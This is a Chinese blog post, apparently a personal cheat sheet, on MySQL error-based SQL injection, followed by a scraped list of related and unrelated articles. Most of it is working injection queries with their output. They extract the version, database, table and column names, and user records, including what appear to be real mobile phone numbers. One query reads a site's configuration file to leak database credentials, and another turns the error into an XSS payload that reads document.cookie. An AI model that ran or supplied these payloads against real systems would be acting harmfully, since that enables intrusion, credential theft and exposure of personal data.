报错是如何转为xss的?

mysql语句在页面报错,泄露信息

=========================================================================================================================================================================

*	报错方式之“updatexml”,有字数限制,但无需配合union。

	-	mysql> select updatexml(1, concat(':', 'test'), 1);

			ERROR 1105 (HY000): XPATH syntax error: ':test'

	-	mysql> select updatexml(1, concat(0x3a, 'test'), 1);

			ERROR 1105 (HY000): XPATH syntax error: ':test'

	-	mysql> select updatexml(1, concat(0x5e, 'test'), 1);

			ERROR 1105 (HY000): XPATH syntax error: '^test'

	-	mysql>  select * from f_user where id=1 or 1=updatexml(1,concat(0x5e, 'test'),1);

			ERROR 1105 (HY000): XPATH syntax error: '^test'

	**	将上面‘test’换成你的子查询语句或函数均可。

*	group by+rand(0)+having,无字数限制,无需配合union。

	-	mysql>  select * from f_user where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0);

			ERROR 1062 (23000): Duplicate entry '5.6.21-log~1' for key 'group_key'

*	报错方式之“rand+count+group by”,需配合union

	rand(0)无论在哪台机器运行多少次,生成的序列都是一样的

	参考mysql开发者社区曝光的bug http://bugs.mysql.com/bug.php?id=8652

	-	mysql>  select 1,2,count(*),concat('test', char(0x5e), floor(rand(0)*2))x from information_schema.tables group by x;

			ERROR 1062 (23000): Duplicate entry 'test^1' for key 'group_key'

	-	mysql>  select 1,2,count(*),concat('test', char(0x5e), left(rand(0),3))x from information_schema.tables group by x;

			ERROR 1062 (23000): Duplicate entry 'test^0.7' for key 'group_key'

	**	将上面‘test’换成你的子查询语句或函数均可。

mysql转xss语句

	mysql>  select 1,2,count(*),concat((select 0x2F3E3C696D67207372633D226675636B22206F6E6572726F723D616C65727428646F63756D656E742E636F6F6B6965293E), char(0x5e), left(rand(0),3))x from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry '/><img src="fuck" onerror=alert(document.cookie)>^0.7' for key 'group_key'

直接爆配置文件密码,前提是有file权限

	mysql>	select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),150,40) ),1);

		ERROR 1105 (HY000): XPATH syntax error: ':	'DB_NAME'   => 'fan******un','

	mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),200,40) ),1);

		ERROR 1105 (HY000): XPATH syntax error: ':	'DB_USER'   => 's*********b', /'

	mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),250,40) ),1);

		ERROR 1105 (HY000): XPATH syntax error: ':PWD'    => 'hahahaahhah','

爆版本

	mysql> select 1,2,3,4 union select distinct concat((select version()),floor(rand(0)*2))a, count(*),3,4 from information_schema.tables group by a;

		ERROR 1062 (23000): Duplicate entry '5.6.21-log1' for key 'group_key'

爆库名

	mysql> select info();

		ERROR 1305 (42000): FUNCTION fangjiangjun.info does not exist

	mysql> select count(*), ( concat( (select database()), char(0x5e), floor(rand(0)*2) ) )x from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'fangjiangjun^1' for key 'group_key'

爆表名

	mysql> select concat( (select distinct table_name from information_schema.tables limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'CHARACTER_SETS^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'COLLATIONS^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables limit 2,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'COLLATION_CHARACTER_SET_APPLICABILITY^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'f_admin^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'f_admin_role^1' for key 'group_key'

爆字段名

	mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'id^1' for key 'group_key'

	mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'login_time^1' for key 'group_key'

爆字段值

	mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry '18602029479^1' for key 'group_key'

	mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry '15602267509^1' for key 'group_key'

  

mysql基于“报错”的注入的更多相关文章

  1. sql注入--基于报错的注入

    这是经典的sqli-labs 中的less-5 问题首先通过几个常见的进行测试, 发现只要正确的话就会输出you are in.... 并不能绕过,因此不能出现敏感信息,因此要用一种新思路(参考白帽学 ...

  2. 2019-9-9:渗透测试,基础学习,phpmyadmin getshell方法,基于时间的盲注,基于报错的注入,笔记

    phpmyadmin getshell方法1,查看是否有导入导出设置 show global variables like '%secure-file-priv%';2,如果secure-file-p ...

  3. MySQL基于报错注入2

    目标站点: 0x1 注入点判断 http://www.xxxxxx.com/pages/services.php?id=1 #true http://www.xxxxxx.com/pages/serv ...

  4. MySQL基于报错注入1

    0x1 判断注入点: http://www.xxxx.ro/s.php?id=1' 那么尝试闭合下单引号 http://www.xxxx.ro/s.php?id=1' --+ 0x2 枚举下表的列 h ...

  5. sqli-labs:1-4,基于报错的注入

    sqli1: 脚本 # -*- coding: utf-8 -*- """ Created on Sat Mar 23 09:37:14 2019 @author: ke ...

  6. Mysql报错型注入总结

    Mysql注入虽然是老生常谈的问题,但是工作中更多的是使用sqlmap等工具进行注入测试的,原理方面还是不是很清楚,所以这段时间主要是自己搭建环境在学手工注入,简单的将自己的学习做一个总结和记录.在常 ...

  7. python 3.5.2安装mysql驱动报错

    python 3.5.2安装mysql驱动报错 python 3.5.2安装mysql驱动时出现如下异常: [root@localhost www]# pip install mysql-connec ...

  8. Loadrunner参数化连接oracle、mysql数据源报错及解决办法

    Loadrunner参数化连接oracle.mysql数据源报错及解决办法 (本人系统是Win7 64,  两位小伙伴因为是默认安装lr,安装在 最终参数化的时候,出现连接字符串无法自动加载出来: 最 ...

  9. 连接mysql数据库报错java.sql.SQLException: The server time zone value '�й���׼ʱ��' is unrecognized...解决方法

    今天连接mysql数据库报错如下: java.sql.SQLException: The server time zone value '�й���׼ʱ��' is unrecognized or r ...

随机推荐

  1. 记一次简单的SQL优化

    原来的sql是这样写的 SELECT d.ONSALE_BARCODE, d.ONSALE_NAME, c.ONSALE_ID, CAST( , ) ) AS CUSTOMARY_PRICE, CAS ...

  2. HTML5全屏(Fullscreen)API详细介绍

    // 整个页面 onclick=   launchFullScreen(document.documentElement); // 某个元素 launchFullScreen(document.get ...

  3. CFD冲蚀模拟的一些理论

    [TOC] 在CFD中计算颗粒对固体壁面的冲蚀往往采用冲蚀模型(Erosion Model). 1 冲蚀速率(Erosion Rate) 冲蚀速率定义为壁面材料在单位时间单位面积上损失的质量(单位:\ ...

  4. mysql小技巧

    将一列值赋予另一列 会遇到新增一列, 需要用其他列的值来初始化这一列 或者根据业务条件把某行的某列值直接赋予到其他列. 行号 列1 列2 1 aaa ddd 2 bbb ccc UPDATE 表 SE ...

  5. [python]设计模式

    需要说明:java跟python在思维模式上并不一样,java利用接口以及多态可以实现很多抽象上的东西,而python不行,其实以下很多设计模式写法并不适用也没有必要,更多是为了对比和帮助理解这些设计 ...

  6. [LeetCode] Longest Common Prefix 最长共同前缀

    Write a function to find the longest common prefix string amongst an array of strings. 这道题让我们求一系列字符串 ...

  7. 20145215&20145307《信息安全系统设计基础》实验五 网络通信

    小组成员:20145215卢肖明.20145307陈俊达 实验报告链接:信息安全系统设计基础--实验五实验报告

  8. C#代码中实现两个表(DataTable)的关联查询(JOIN)

    之前通常都是使用SQL直接从数据库中取出表1和表2关联查询后的数据,只需要用一个JOIN就可以了,非常方便.近日遇到一种情况,两个表中的数据已经取到代码中,需要在代码中将这两个表关联起来,并得到它们横 ...

  9. 【Pyhon 3】: 170104:优品课堂: GUI -tkinter

    from tkinter import * root = Tk() root.title("BMS 图书管理系统") lbl = Label(root, text='书名:') # ...

  10. asp.net gridview 分页显示不出来的问题

    使用gridview分页显示,在点击第二页的时候显示空白,无数据. 原因是页面刷新,绑定datatable未执行 解决方法: 1.将datatable设置为静态 2.在OnPageIndexChang ...